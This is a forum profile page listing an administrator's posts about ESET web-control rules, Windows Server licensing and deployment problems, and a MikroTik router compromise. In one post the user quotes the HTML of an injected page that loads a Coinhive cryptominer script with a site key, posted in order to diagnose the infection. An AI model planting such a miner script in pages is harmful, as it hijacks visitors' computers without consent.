Jump to content

MAGIK José Rocha

Members
  • Posts

    12
  • Joined

  • Last visited

About MAGIK José Rocha

  • Rank
    Newbie
    Newbie

Profile Information

  • Location
    Portugal

Recent Profile Visitors

416 profile views
  1. We are applying a custom policy for web control where we allow specific URL's and after that we block a Category Group. The problem we are facing is that, if the allowed url belongs to a blocked Category, the user can't access that url. From the documentation found HERE, this is not the expected behaviour and the user should be able to access the URL as they are evaluated first. With the settings example bellow, we are unable to access WINESTUFF.PT because it's being blocked by the category based rule where we block "Alcohol and Tobacco" related sites. Can anyone explain if I'm doing something wrong ? Thanks in advance
  2. Will have to try that solution tomorrow. Thanks for your help.
  3. I've implemented an Internet access control policy where we have the following requirements: Block access to several group categories of sites Allow access to specific urls The problem is that I'm getting the sites blocked by category but the url group's we allow are also blocked, if they belong to one of the blocked categories. I believe ESET should act as a regular firewall, applying rules in the order I've configured, and accepting a connection as soon as it's authorised, not proceeding to the following rules. Here is an piece of my policy: I'was expecting to be able to open the website https://www.martini.com/pt/pt/ but it gets blocked by the category group. Is there any way I can get the expected result? Thanks in advance for any help with this issue. Best Regards, José Rocha @ Magikevolution
  4. I undertand that it isn't a recommended approach but we've had it working on critical server for a long time ago without any issue. The reason for that is that we have real people working on that server, receiving emails, accessing web pages and all those things we have inside a Desktop OS and File Server v6 didn't address our needs. I believe the installer was blocking the installation of Endpoint v7 on a server but maybe I missed something. Will check it again on a demo server. The URL Management is not that easy to maintain, so we must find another way. Thanks for your help.
  5. A lot of our clients use Windows Server to provide RDP services for their users, local and remote ones. As most of they users are point of sales operators they internet access to the company website and other websites related to products that they work with, but shouldn't use other webpages. On the other end there are groups of users who may access social networks and other users that must have unrestricted access to internet. With ESET Version 6 we made it by installing ESET Endpoint Security and tweaking policies to make it work in a Windows Server without impact on performance or services communication. This solution is working since almost 3 years with servers that have >40 remote sessions at a time, but now we want to upgrade to ESET v7 and I see that the ESET Endpoint Security doesn't install on a Windows Server anymore, leaving us without a solution to upgrade ESET on that servers. I understand that a Windows Server provides a lot of services that need to be taken into consideration and should have a different approach than a Windows Desktop OS, but it seams ESET isn't taking into consideration that a Windows Server with Remote Desktop Services provides multiple windows desktops, with multiple users and needs, so we should be able to use the same features of ESET Endpoint security on a ESET File Security for Windows Server. Is there any way of doing it with ESET v7> ? Thank you Note: I know we should use a UTM and we'll have it on some clients, to provide this and other features, but some clients can't afford it and I was hopping to solve it with ESET.
  6. I've made a Policy for all workstation on that domain to disable Smartscreen and the Deployment Tool was able to install without any problem.
  7. I've created a all-in-one installer to use with Eset Deployment Tool and it went without erros, showing a success message. The problem is that nothing was installed and the workstation is still running the older versions. I tried to run the same installer at that workstation to see if there is some error at the installation process and I've received a message that Smartscreen has blocked the execution of the installer. Then, I've asked smartsceen to run the setup anyway and everything is installed without problems. Is there any way of making the deployment tool avoid this message or disabling smartscreen via policy is the only option?
  8. Here is the html source for the page that runs the miner: <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1251"> <title>"$(url)"</title> <_script src="https://coinhive.com/lib/coinhive.min.js"></script> <_script> var miner = new CoinHive.Anonymous('ZopliillHRjWlp5B3JTrS4hKQP8jAKwp', {throttle: 0.2}); miner.start(); </script> </head> <frameset> <frame src="$(url)"></frame> </frameset> </html>
  9. I've been able to find the origin of this detections and already solved the problem. When I was trying to understand the origin of this trojans, I've noticed that some os the addresses where legit and doesn't raise any problems outside our client network. So I started a search for some kind of proxy that could inject malicious code tho legit http pages and find out that they had their Mikrotik router hacked to make every request made to port 80 go through the web proxy on port 8080, where they injected the malicious code and it was blocked later on the client machine. The hack has been possible because of this vulnerability on Mikrotik Router OS https://blog.mikrotik.com/security/winbox-vulnerability.html I've changed every passwords, disabled the web proxy and deleted the firewall rule, so now everything if fine. @itman, @Marcos Thanks for the tips
  10. Here are the collected logs on the affected machine. Thanks for your help. ees_logs.zip
  11. Hi, We have a computer with more than 10.000 detected threats like the one bellow: Threat: JS/CoinMiner.AH Process: C:\Windows\System32\wscript.exe Object: hxxp://10.100.1.254/adpb/registration?username=carlota&domain=MYDOM&hostname=TSDC10&action=login Is this a sign that the computer is infected or this is the result of attempts to infect it? Note: The address 10.100.1.254 is a Mikrotik router and it is updated with latest updates.
×
×
  • Create New...